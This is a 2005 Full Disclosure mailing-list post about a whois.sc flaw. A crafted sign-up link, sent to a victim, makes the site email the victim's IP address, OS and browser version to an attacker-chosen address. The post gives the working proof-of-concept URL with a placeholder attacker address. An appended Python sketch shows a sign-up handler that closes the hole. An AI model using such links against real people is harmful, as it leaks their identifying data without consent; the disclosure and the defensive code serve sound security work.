Full Disclosure mailing list archives

whois.sc not-big-deal hole (2nd post)


From: unknown unknown <unknown.pentester () gmail com>
Date: Thu, 3 Nov 2005 09:30:19 +0000

I just forgot to mention in the previous post that after the victim
clicks on the specially-crafted link, the attacker should be able to
receive an account sign-up email with the following information about
the victim (located at the bottom of the email body):

- IP Address
- Operating system version
- Web browser version


The bottom of the email looks like this (some information has been hidden):

---------------------------------------------------
NOTE: You received this message because someone from
X.X.X.X(Mozilla/X.X (Windows; U; Windows NT X.X; en-US; rv:X.X.X)
Gecko/2005XXXX Firefox/X.X.X)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------



PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40gmail.com


Replace "attacker%40gmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the victim.

Note: the only limitation of this "trick" is that the attacker needs
to use a different email address for each attack. This is because
whois.sc will set the account activation status to "pending" after
requesting the account activation for the first time.



Regards,

pagvac
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
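
The behaviour described in this post depends on two things: the sign-up action fires when a link is followed, and the confirmation email carries the requester's IP address and browser string. The sketch below is an added example, not part of the original post and not whois.sc's code, showing a handler that closes both; the function names, the `csrf_token` field and the session model are assumptions.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret (constructed for this example).
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_id: str) -> str:
    """Token bound to the visitor's session, embedded in the sign-up form."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def handle_newaccount(method, session_id, params, client_ip, user_agent, audit_log):
    """Hypothetical sign-up handler. Returns (http_status, email_body_or_None)."""
    # 1. A state-changing action must not be reachable by following a link.
    if method != "POST":
        return 405, None

    # 2. The request must carry the token from the form served to this
    #    session, so a third party cannot pre-build a working request.
    supplied = params.get("csrf_token", "").encode()
    expected = csrf_token(session_id or "").encode()
    if not session_id or not hmac.compare_digest(supplied, expected):
        return 403, None

    email = params.get("email")
    if not email:
        return 400, None

    # 3. Requester metadata stays in the server-side audit log. It is never
    #    written into mail sent to an address nobody has verified yet.
    audit_log.append({"email": email, "ip": client_ip, "ua": user_agent})
    body = (
        "NOTE: You received this message because someone requested an "
        "account for this email address. If you did not request this "
        "account please ignore this message."
    )
    return 200, body
```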

